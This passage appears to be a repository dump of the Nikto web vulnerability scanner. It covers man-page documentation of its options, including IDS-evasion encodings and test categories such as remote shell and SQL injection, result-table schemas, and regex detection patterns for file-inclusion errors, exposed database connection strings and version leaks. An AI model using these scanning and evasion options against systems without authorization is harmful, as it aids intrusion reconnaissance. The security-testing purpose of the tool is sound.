<varlistentry>\n        <term><option>-404string</option> <replaceable>string</replaceable></term>\n        <listitem>\n          <para>Ignore this string in response body content as negative response (always). Can be a regular expression.</para>\n        </listitem>\n      </varlistentry>\n    </variablelist>\n  </refsect1>\n\n  <refsect1>\n    <title>DSL Matchers</title>\n    <para>\n      Nikto's test database supports a mini-DSL for matching responses. The following matchers are supported:\n      <itemizedlist>\n        <listitem><para><literal>BODY:</literal> and <literal>!BODY:</literal> — Match or exclude content in the response body.</para></listitem>\n        <listitem><para><literal>HEADER:</literal> and <literal>!HEADER:</literal> — Match or exclude content in HTTP headers.</para></listitem>\n        <listitem><para><literal>COOKIE:</literal> and <literal>!COOKIE:</literal> — Match or exclude content in HTTP cookies. (NEW)</para></listitem>\n        <listitem><para><literal>CODE:</literal> and <literal>!CODE:</literal> — Match or exclude HTTP status codes.</para></listitem>\n      </itemizedlist>\n      <para>You can combine multiple matchers with <literal>&amp;&amp;</literal> (AND). Example:</para>\n      <programlisting>\n        BODY:login&amp;&amp;!BODY:logout&amp;&amp;HEADER:X-Powered-By&amp;&amp;COOKIE:sessionid\n      </programlisting>\n      <para>This will match if the response body contains \"login\", does not contain \"logout\", the headers include \"X-Powered-By\", and a cookie named \"sessionid\" is present.</para>\n    </para>\n  </refsect1>\n\n  <refsect1>\n    <title>Files</title>\n    <variablelist>\n      <varlistentry>\n        <term><filename>nikto.conf</filename></term>\n        <listitem>\n          <para>The Nikto configuration file. This sets Nikto's global options. Several nikto.conf files may exist and are parsed in the below order. As each configuration file is loaded is supersedes any previously set configuration:</para>\n          <itemizedlist>\n            <listitem><para>System wide (e.g. /etc/nikto.conf)</para></listitem>\n            <listitem><para>Home directory (e.g. $HOME/nikto.conf)</para></listitem>\n            <listitem><para>Current directory (e.g. ./nikto.conf)</para></listitem>\n          </itemizedlist>\n        </listitem>\n      </varlistentry>\n      <varlistentry>\n        <term><filename>${NIKTO_DIR}/databases/db*</filename></term>\n        <listitem>\n          <para>Database files that nikto uses to check for vulnerabilities and issues within the web server.</para>\n        </listitem>\n      </varlistentry>\n      <varlistentry>\n        <term><filename>${NIKTO_DIR}/plugins/*.plugin</filename></term>\n        <listitem>\n          <para>All nikto's plugins exist here. Nikto itself is just a wrapper script to manage CLI and pass through to the plugins.</para>\n        </listitem>\n      </varlistentry>\n      <varlistentry>\n        <term><filename>${NIKTO_DIR}/templates</filename></term>\n        <listitem>\n          <para>Contains the templates for nikto's output formats.</para>\n        </listitem>\n      </varlistentry>\n    </variablelist>\n  </refsect1>\n\n  <refsect1>\n    <title>Bugs</title>\n    <para>\n      The current features are not supported:\n    </para>\n    <itemizedlist>\n      <listitem>\n        <para>SOCKS Proxies</para>\n      </listitem>\n    </itemizedlist>\n  </refsect1>\n\n  <refsect1>\n    <title>Authors</title>\n    <para>\n      Nikto is written and maintained by Chris Sullo and David Lodge. See the main documentation for other contributors.\n    </para>\n    <para>\n      All code is Copyright CIRT, Inc., except LibWhisker which is Copyright (c) 2009, Jeff Forristal (wiretrip.net). Other portions of code may be (C) as specified.\n    </para>\n  </refsect1>\n\n  <refsect1>\n    <title>See also</title>\n    <para>\n      <ulink url=\"http://www.cirt.net/\">Nikto Homepage</ulink>\n    </para>\n  </refsect1>\n</refentry>\n"
  },
  {
    "path": "documentation/nikto.1",
    "content": "'\\\" t\n.\\\"     Title: nikto.pl\n.\\\"    Author: [see the \"Authors\" section]\n.\\\" Generator: DocBook XSL Stylesheets vsnapshot <http://docbook.sf.net/>\n.\\\"      Date: 12/24/2025\n.\\\"    Manual: Vulnerability Scanner\n.\\\"    Source: http://www.cirt.net/ 2.5.0\n.\\\"  Language: English\n.\\\"\n.TH \"NIKTO\\&.PL\" \"1\" \"12/24/2025\" \"http://www\\&.cirt\\&.net/ 2\\&.5\" \"Vulnerability Scanner\"\n.\\\" -----------------------------------------------------------------\n.\\\" * Define some portability stuff\n.\\\" -----------------------------------------------------------------\n.\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n.\\\" http://bugs.debian.org/507673\n.\\\" http://lists.gnu.org/archive/html/groff/2009-02/msg00013.html\n.\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n.ie \\n(.g .ds Aq \\(aq\n.el       .ds Aq '\n.\\\" -----------------------------------------------------------------\n.\\\" * set default formatting\n.\\\" -----------------------------------------------------------------\n.\\\" disable hyphenation\n.nh\n.\\\" disable justification (adjust text to left margin only)\n.ad l\n.\\\" -----------------------------------------------------------------\n.\\\" * MAIN CONTENT STARTS HERE *\n.\\\" -----------------------------------------------------------------\n.SH \"NAME\"\nnikto.pl \\- Scan web server for known vulnerabilities\n.SH \"SYNOPSIS\"\n.HP \\w'\\fBnikto\\&.pl\\fR\\ 'u\n\\fBnikto\\&.pl\\fR [options...]\n.SH \"DESCRIPTION\"\n.PP\nNikto is an Open Source web server scanner which performs comprehensive tests against web servers for multiple items that are generally considered dangerous\\&. It checks for:\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\nServer and software misconfigurations\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\nDefault files and programs\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\nInsecure files and programs\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\nOutdated servers and programs\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\nDangerous files\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\nOther problems\n.RE\n.PP\nNikto is built on LibWhisker2 (LW2) and can run on any platform which has a Perl environment\\&. It supports SSL, proxies, host authentication, attack encoding and more\\&. It can be updated automatically from the command\\-line, and supports the optional submission of updated version data back to the maintainers\\&.\n.SH \"OPTIONS\"\n.PP\n\\fB\\-ask\\fR \\fIyes|no|auto\\fR\n.RS 4\nWhether to ask about submitting updates\\&. Options: yes (ask about each), no (don\\*(Aqt ask, don\\*(Aqt send), auto (don\\*(Aqt ask, just send)\\&.\n.RE\n.PP\n\\fB\\-Add\\-header\\fR \\fIheader:value\\fR\n.RS 4\nAdd HTTP headers (can be used multiple times, one per header pair)\\&.\n.RE\n.PP\n\\fB\\-check6\\fR\n.RS 4\nCheck if IPv6 is working (connects to ipv6\\&.google\\&.com or value set in nikto\\&.conf)\\&.\n.RE\n.PP\n\\fB\\-Cgidirs\\fR \\fIdirs\\fR\n.RS 4\nScan these CGI directories\\&. Special words \"none\" or \"all\" may be used\\&. A literal value for a CGI directory such as \"/cgi\\-test/\" may be specified (must include trailing slash)\\&.\n.RE\n.PP\n\\fB\\-config\\fR \\fIfile\\fR\n.RS 4\nUse this config file instead of the default nikto\\&.conf\\&.\n.RE\n.PP\n\\fB\\-dbcheck\\fR\n.RS 4\nCheck database and other key files for syntax errors\\&.\n.RE\n.PP\n\\fB\\-Display\\fR \\fIoptions\\fR\n.RS 4\nTurn on/off display outputs: 1 (Show redirects), 2 (Show cookies received), 3 (Show all 200/OK responses), 4 (Show URLs which require authentication), D (Debug output), E (Display all HTTP errors), P (Print progress to STDOUT), S (Scrub output of IPs and hostnames), V (Verbose output)\\&.\n.RE\n.PP\n\\fB\\-evasion\\fR \\fItechnique\\fR\n.RS 4\nEncoding technique: 1 (Random URI encoding), 2 (Directory self\\-reference), 3 (Premature URL ending), 4 (Prepend long random string), 5 (Fake parameter), 6 (TAB as request spacer), 7 (Change the case of the URL), 8 (Use Windows directory separator), A (Use carriage return as request spacer), B (Use binary value 0x0b as request spacer)\\&.\n.RE\n.PP\n\\fB\\-followredirects\\fR\n.RS 4\nFollow 3xx redirects to new location\\&.\n.RE\n.PP\n\\fB\\-Format\\fR \\fIformat\\fR\n.RS 4\nSave file format: csv (Comma\\-separated\\-value), json (JSON Format), htm (HTML Format), sql (Generic SQL, see docs for schema), sqld (SQL Direct, directly inserts into MySQL/PostgreSQL database), txt (Plain text), xml (XML Format)\\&. Multiple formats can be specified as a comma\\-separated list\\&. If not specified, the format will be taken from the file extension passed to \\-output\\&. Note: sqld format requires DB_TYPE, DB_HOST, DB_PORT, DB_NAME in nikto\\&.conf and NIKTO_DB_USER, NIKTO_DB_PASS environment variables\\&.\n.RE\n.PP\n\\fB\\-Help\\fR\n.RS 4\nDisplay extended help information\\&.\n.RE\n.PP\n\\fB\\-host\\fR \\fItarget\\fR\n.RS 4\nHost(s) to target\\&. Can be an IP address, hostname or text file of hosts\\&. A single dash (\\-) maybe used for stdout\\&. Can also parse nmap \\-oG style output\\&.\n.RE\n.PP\n\\fB\\-id\\fR \\fIid:pass[:realm]\\fR\n.RS 4\nID and password to use for host Basic host authentication\\&. Format is \"id:password\" or \"id:password:realm\"\\&.\n.RE\n.PP\n\\fB\\-ipv4\\fR\n.RS 4\nIPv4 Only\\&.\n.RE\n.PP\n\\fB\\-ipv6\\fR\n.RS 4\nIPv6 Only\\&.\n.RE\n.PP\n\\fB\\-key\\fR \\fIfile\\fR\n.RS 4\nClient certificate key file\\&.\n.RE\n.PP\n\\fB\\-list\\-plugins\\fR\n.RS 4\nList all available plugins, perform no testing\\&.\n.RE\n.PP\n\\fB\\-maxtime\\fR \\fItime\\fR\n.RS 4\nMaximum testing time per host (e\\&.g\\&., 1h, 60m, 3600s)\\&.\n.RE\n.PP\n\\fB\\-mutate\\fR \\fIoptions\\fR\n.RS 4\nGuess additional file names: 1 (Test all files with all root directories), 2 (Guess for password file names), 3 (Enumerate user names via Apache), 4 (Enumerate user names via cgiwrap), 6 (Attempt to guess directory names from dictionary file)\\&.\n.RE\n.PP\n\\fB\\-mutate\\-options\\fR \\fIoptions\\fR\n.RS 4\nProvide information for mutates\\&.\n.RE\n.PP\n\\fB\\-no404\\fR\n.RS 4\nDisables nikto attempting to guess a 404 page\\&.\n.RE\n.PP\n\\fB\\-nocookies\\fR\n.RS 4\nDo not use cookies from responses in requests\\&.\n.RE\n.PP\n\\fB\\-nointeractive\\fR\n.RS 4\nDisable interactive features\\&.\n.RE\n.PP\n\\fB\\-nolookup\\fR\n.RS 4\nDo not perform name lookups on IP addresses\\&.\n.RE\n.PP\n\\fB\\-noslash\\fR\n.RS 4\nStrip trailing slash from URL (e\\&.g\\&., \\*(Aq/admin/\\*(Aq to \\*(Aq/admin\\*(Aq)\\&.\n.RE\n.PP\n\\fB\\-nossl\\fR\n.RS 4\nDo not use SSL to connect to the server\\&.\n.RE\n.PP\n\\fB\\-Option\\fR \\fIname=value\\fR\n.RS 4\nOver\\-ride an option in nikto\\&.conf, can be issued multiple times\\&.\n.RE\n.PP\n\\fB\\-output\\fR \\fIfile\\fR\n.RS 4\nWrite output to the file specified (\\*(Aq\\&.\\*(Aq for auto\\-name)\\&. The format used will be taken from the file extension\\&. This can be over\\-ridden by using the \\-Format option\\&.\n.RE\n.PP\n\\fB\\-Pause\\fR \\fIseconds\\fR\n.RS 4\nSeconds (integer or floating point) to delay between each test\\&.\n.RE\n.PP\n\\fB\\-Platform\\fR \\fIplatform\\fR\n.RS 4\nPlatform of target: nix (Unix/Linux), win (Windows), or all (both)\\&.\n.RE\n.PP\n\\fB\\-Plugins\\fR \\fIlist\\fR\n.RS 4\nList of plugins to run (default: ALL)\\&.\n.RE\n.PP\n\\fB\\-port\\fR \\fIports\\fR\n.RS 4\nTCP port(s) to target\\&. To test more than one port on the same host, specify the list of ports\\&. Ports can be specified as a range (i\\&.e\\&., 80\\-90), or as a comma\\-delimited list, (i\\&.e\\&., 80,88,90)\\&. If not specified, port 80 is used\\&.\n.RE\n.PP\n\\fB\\-RSAcert\\fR \\fIfile\\fR\n.RS 4\nClient certificate file\\&.\n.RE\n.PP\n\\fB\\-root\\fR \\fIpath\\fR\n.RS 4\nPrepend root value to all requests, format is /directory\\&.\n.RE\n.PP\n\\fB\\-Save\\fR \\fIdirectory\\fR\n.RS 4\nSave positive responses to this directory (\\*(Aq\\&.\\*(Aq for auto\\-name)\\&.\n.RE\n.PP\n\\fB\\-ssl\\fR\n.RS 4\nOnly test SSL on the ports specified\\&. Using this option will dramatically speed up requests to HTTPS ports, since otherwise the HTTP request will have to timeout first\\&.\n.RE\n.PP\n\\fB\\-timeout\\fR \\fIseconds\\fR\n.RS 4\nSeconds to wait before timing out a request\\&. Default timeout is 10 seconds\\&.\n.RE\n.PP\n\\fB\\-Tuning\\fR \\fIoptions\\fR\n.RS 4\nTuning options will control the test that Nikto will use against a target\\&. By default, if any options are specified, only those tests will be performed\\&. If the \"x\" option is used, it will reverse the logic and exclude only those tests\\&. Use the reference number or letter to specify the type, multiple may be used:\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\n0 \\- File Upload\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\n1 \\- Interesting File / Seen in logs\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\n2 \\- Misconfiguration / Default File\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\n3 \\- Information Disclosure\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\n4 \\- Injection (XSS/Script/HTML)\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\n5 \\- Remote File Retrieval \\- Inside Web Root\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\n6 \\- Denial of Service\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\n7 \\- Remote File Retrieval \\- Server Wide\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\n8 \\- Command Execution / Remote Shell\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\n9 \\- SQL Injection\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\na \\- Authentication Bypass\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\nb \\- Software Identification\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\nc \\- Remote Source Inclusion\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\nd \\- WebService\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\ne \\- Administrative Console\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\nx \\- Reverse Tuning Options (i\\&.e\\&., include all except specified)\n.RE\n.RE\n.PP\n\\fB\\-url\\fR \\fItarget\\fR\n.RS 4\nTarget host/URL (alias of \\-host)\\&.\n.RE\n.PP\n\\fB\\-Userdbs\\fR \\fItype\\fR\n.RS 4\nLoad only user databases, not the standard databases\\&. Options: all (Disable standard dbs and load only user dbs), tests (Disable only db_tests and load udb_tests)\\&.\n.RE\n.PP\n\\fB\\-useragent\\fR \\fIstring\\fR\n.RS 4\nOver\\-rides the default useragent\\&.\n.RE\n.PP\n\\fB\\-useproxy\\fR \\fIproxy\\fR\n.RS 4\nUse the HTTP proxy defined in the configuration file, or given as argument in the format http://server:port\\&.\n.RE\n.PP\n\\fB\\-Version\\fR\n.RS 4\nDisplay the Nikto software, plugin and database versions\\&.\n.RE\n.PP\n\\fB\\-vhost\\fR \\fIhostname\\fR\n.RS 4\nSpecify the Host header to be sent to the target\\&.\n.RE\n.PP\n\\fB\\-404code\\fR \\fIcodes\\fR\n.RS 4\nIgnore these HTTP codes as negative responses (always)\\&. Format is \"302,301\"\\&.\n.RE\n.PP\n\\fB\\-404string\\fR \\fIstring\\fR\n.RS 4\nIgnore this string in response body content as negative response (always)\\&. Can be a regular expression\\&.\n.RE\n.SH \"DSL MATCHERS\"\n.PP\nNikto\\*(Aqs test database supports a mini\\-DSL for matching responses\\&. The following matchers are supported:\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\nBODY:\nand\n!BODY:\n\\(em Match or exclude content in the response body\\&.\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\nHEADER:\nand\n!HEADER:\n\\(em Match or exclude content in HTTP headers\\&.\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\nCOOKIE:\nand\n!COOKIE:\n\\(em Match or exclude content in HTTP cookies\\&. (NEW)\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\nCODE:\nand\n!CODE:\n\\(em Match or exclude HTTP status codes\\&.\n.RE\n.PP You can combine multiple matchers with && (AND)\\&. Example:\n.sp\n.if n \\{\\\n.RS 4\n.\\}\n.nf\n        BODY:login&&!BODY:logout&&HEADER:X\\-Powered\\-By&&COOKIE:sessionid\n      \n.fi\n.if n \\{\\\n.RE\n.\\}\n.PP This will match if the response body contains \"login\", does not contain \"logout\", the headers include \"X\\-Powered\\-By\", and a cookie named \"sessionid\" is present\\&.\n.SH \"FILES\"\n.PP\nnikto\\&.conf\n.RS 4\nThe Nikto configuration file\\&. This sets Nikto\\*(Aqs global options\\&. Several nikto\\&.conf files may exist and are parsed in the below order\\&. As each configuration file is loaded is supersedes any previously set configuration:\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\nSystem wide (e\\&.g\\&. /etc/nikto\\&.conf)\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\nHome directory (e\\&.g\\&. $HOME/nikto\\&.conf)\n.RE\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\nCurrent directory (e\\&.g\\&. \\&./nikto\\&.conf)\n.RE\n.RE\n.PP\n${NIKTO_DIR}/databases/db*\n.RS 4\nDatabase files that nikto uses to check for vulnerabilities and issues within the web server\\&.\n.RE\n.PP\n${NIKTO_DIR}/plugins/*\\&.plugin\n.RS 4\nAll nikto\\*(Aqs plugins exist here\\&. Nikto itself is just a wrapper script to manage CLI and pass through to the plugins\\&.\n.RE\n.PP\n${NIKTO_DIR}/templates\n.RS 4\nContains the templates for nikto\\*(Aqs output formats\\&.\n.RE\n.SH \"BUGS\"\n.PP\nThe current features are not supported:\n.sp\n.RS 4\n.ie n \\{\\\n\\h'-04'\\(bu\\h'+03'\\c\n.\\}\n.el \\{\\\n.sp -1\n.IP \\(bu 2.3\n.\\}\nSOCKS Proxies\n.RE\n.SH \"AUTHORS\"\n.PP\nNikto is written and maintained by Chris Sullo and David Lodge\\&. See the main documentation for other contributors\\&.\n.PP\nAll code is Copyright CIRT, Inc\\&., except LibWhisker which is Copyright (c) 2009, Jeff Forristal (wiretrip\\&.net)\\&. Other portions of code may be (C) as specified\\&.\n.SH \"SEE ALSO\"\n.PP\n\\m[blue]\\fBNikto Homepage\\fR\\m[]\\&\\s-2\\u[1]\\d\\s+2\n.SH \"NOTES\"\n.IP \" 1.\" 4\nNikto Homepage\n.RS 4\n\\%http://www.cirt.net/\n.RE\n"
  },
  {
    "path": "documentation/nikto_schema_mysql.sql",
    "content": "CREATE TABLE `nikto_table` (\n  `id` int(11) NOT NULL AUTO_INCREMENT,\n  `scanid` varchar(32) DEFAULT NULL,\n  `testid` varchar(6) NOT NULL,\n  `ip` varchar(15) DEFAULT NULL,\n  `hostname` text DEFAULT NULL,\n  `port` int(5) DEFAULT NULL,\n  `tls` tinyint(1) DEFAULT NULL,\n  `refs` text DEFAULT NULL,\n  `httpmethod` text DEFAULT NULL,\n  `uri` text DEFAULT NULL,\n  `message` text DEFAULT NULL,\n  `request` blob DEFAULT NULL,\n  `response` mediumblob DEFAULT NULL,\n  PRIMARY KEY (`id`)\n);\n\n-- MySQL/MariaDB specific column types:\n--   request: BLOB (64KB limit)\n--   response: MEDIUMBLOB (16MB limit)\n-- The plugin automatically truncates data to fit within these limits:\n--   request: 48KB raw (fits in 64KB BLOB after base64 encoding)\n--   response: 12MB raw (fits in 16MB MEDIUMBLOB after base64 encoding)\n"
  },
  {
    "path": "documentation/nikto_schema_postgresql.sql",
    "content": "CREATE TABLE nikto_table (\n  id serial NOT NULL,\n  scanid varchar(32) DEFAULT NULL,\n  testid varchar(6) NOT NULL,\n  ip varchar(15) DEFAULT NULL,\n  hostname text DEFAULT NULL,\n  port integer DEFAULT NULL,\n  tls smallint DEFAULT NULL,\n  refs text DEFAULT NULL,\n  httpmethod text DEFAULT NULL,\n  uri text DEFAULT NULL,\n  message text DEFAULT NULL,\n  request bytea DEFAULT NULL,\n  response bytea DEFAULT NULL,\n  PRIMARY KEY (id)\n);\n\n-- PostgreSQL specific column types:\n--   request: bytea (theoretical limit ~1GB, practical limits apply)\n--   response: bytea (theoretical limit ~1GB, practical limits apply)\n-- The plugin automatically truncates data for performance and cross-DB compatibility:\n--   request: 48KB raw (matches MySQL BLOB limit)\n--   response: 12MB raw (matches MySQL MEDIUMBLOB limit)\n-- PostgreSQL bytea can store much larger data, but these limits ensure consistent\n-- behavior across database types and prevent performance issues with very large responses\n\n"
  },
  {
    "path": "documentation/perltidyrc",
    "content": "# perltidy options for nikto development\n# copy to ~/.perltidyrc\n-lp\n-vt=2\n-pt=2\n-cti=3\n-bar\n-nolq\n-l=100\n"
  },
  {
    "path": "program/.timestamp",
    "content": "1773974668\n"
  },
  {
    "path": "program/databases/db_404_strings",
    "content": "#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from \n# Chris Sullo (sullo@cirt.net)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# Strings to be used for 404 content match\n#######################################################################\nAccess Failed\nan error\nBad Request\nClient Authentication Remote Service\ncould not find\nerror has occurred\nError 404\nError Occurred While Processing Request\nError processing SSI file\nExtendNet DX Configuration\nFireWall-1 message\nforcelogon.htm\nIMail Server Web Messaging\nManagement Console\t\nname=qt id=\"search\" size=40 value=\" \"\nNo web site is configured at this address\nnot found\nparameter is incorrect                                   # IIS 5.0 500 error\nPlease identify yourself:\nReload acp_userinfo database\nRSA SecurID User Name Request\nThe userid or password that was specified is not valid.  # Tivoli server administrator   \nTYPE=password\t                                         # As in \"<input type=password>\"\nUnable to complete your request\nunable to open\nWeb access denied\nHack Attempts\ndoes not exist                                           # SAP NetWeaver\n<b>Wrong URL.                                            # Cisco SSL VPN\npage may no longer exist\npage no longer exist\nYour session has expired\t\t\t\t# cPanel webmail\nno longer available\nRequest Rejected\nMore about this error\t\t\t\t\t# MS Lync 2010\nNo target SAP system for request\t\t\t# SAP web server\nno valid destination server available for\t\t# SAP web server\nunauthorized public IP address\t\t\t\t# BigIP\n<TITLE>Invalid URL</TITLE>                              # AkamaiGhost\nWebContentNotFound\n"
  },
  {
    "path": "program/databases/db_content_search",
    "content": "#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (sullo@cirt.net)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# Matchers can be regex and support etractors. \n# WARNING: these match every response--be efficient and minimal.\n#######################################################################\n\"nikto_id\",\"references\",\"matchstring\",\"message\"\n\"750500\",\"CWE-548\",\"[iI]ndex\\s[oO]f\\s\\/\",\"Directory indexing found.\"\n\"750501\",\"\",\"(Warning(?:<\\/b>)?:\\s+(?:include|require)(?:_once)?\\()\",\"PHP include error may indicate local or remote file inclusion is possible. The error is: $1 .\"\n\"750502\",\"\",\"failed to open stream: No such file or directory in (?:<b>)?([a-zA-Z]:\\\\|\\/)\",\"PHP include error reveals the full path to the web root. The error is: $1 .\"\n\"750503\",\"\",\"mysql_p?connect\\(\",\"Potential PHP MySQL database connection string found.\"\n\"750504\",\"\",\"pgp_p?connect\\(\",\"Potential PHP PostgreSQL database connection string found.\"\n\"750505\",\"\",\"sqlite_p?open\\(\",\"Potential PHP SQLite database connection string found.\"\n\"750506\",\"\",\"mssql_p?connect\\(\",\"Potential PHP MSSQL database connection string found.\"\n\"750507\",\"\",\"Call to undefined function.*\\(\\) in \\/\",\"PHP error reveals file system path.\"\n\"750508\",\"CVE-2006-5272\",\"FrameworkLog.xsl\\\"\\\\?>.*<version>([0-2]|3\\.(?:[0-5]|6\\.0\\.(?:[0-4]|5(?:[0-3]|4[0-5]))))\",\"McAfee Common Management Agent version $1 found.\"\n\"750509\",\"\",\"However, we found documents with names similar to the one you requested\",\"The mod_speling module can reveal otherwise 'hidden' files in directories.\"\n\"750510\",\"\",\"makes use of the Zend Scripting Language\",\"Output from the phpinfo() function was found.\"\n\"750511\",\"\",\"SQLSTATE\\[\",\"A database error may reveal internal details about the running database.\"\n\"750512\",\"CWE-548\",\"jetty-dir.css\\\" REL=\\\"stylesheet\\\" TYPE=\\\"text/css\\\"\\/><TITLE>Directory: \\/\",\"Jetty directory indexing found.\"\n\"750516\",\"\",\"plain HTTP to an SSL\",\"You appear to be scanning an HTTPS site with HTTP. This probably isn't what you want.\"\n\"750517\",\"\",\"plain HTTP request was sent to HTTPS\",\"You appear to be scanning an HTTPS site with HTTP. This probably isn't what you want.\"\n\"750519\",\"\",\"[Tt]omcat\\s([0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})\",\"The Tomcat version is disclosed in error pages: $1.\"\n\"750520\",\"\",\"\\<html\\>\\<head\\>\\<title\\>Remote Access Controller<\\/title>\",\"Host seems to be a Dell Remote Access Controller.\"\n\"750521\",\"https://makeawebsitehub.com/parked-domains/\",\"parked FREE\",\"Domain is parked at GoDaddy.\"\n\"750522\",\"https://makeawebsitehub.com/parked-domains/\",\"courtesy of GoDaddy\\.com\",\"Domain is parked at GoDaddy.\"\n\"750523\",\"https://makeawebsitehub.com/parked-domains/\",\"buy domain names\",\"Domain is parked at GoDaddy.\"\n\"750524\",\"https://makeawebsitehub.com/parked-domains/\",\"\\?epl\\=\",\"Domain is parked at domainsponsor.com.\"\n\"750525\",\"https://makeawebsitehub.com/parked-domains/\",\"Below are sponsored listings\",\"Domain is parked at Google.\"\n\"750526\",\"https://makeawebsitehub.com/parked-domains/\",\"doubleclick\\.net\\/apps\\/domainpark\",\"Domain is parked at Google.\"\n\"750527\",\"https://makeawebsitehub.com/parked-domains/\",\"Asia Registry\",\"Domain is parked at AsiaRegistry.com.\"\n\"750528\",\"https://makeawebsitehub.com/parked-domains/\",\"Get a domain name\",\"Domain is parked at Network Solutions.\"\n\"750529\",\"https://makeawebsitehub.com/parked-domains/\",\"netsolhost\",\"Domain is parked at Network 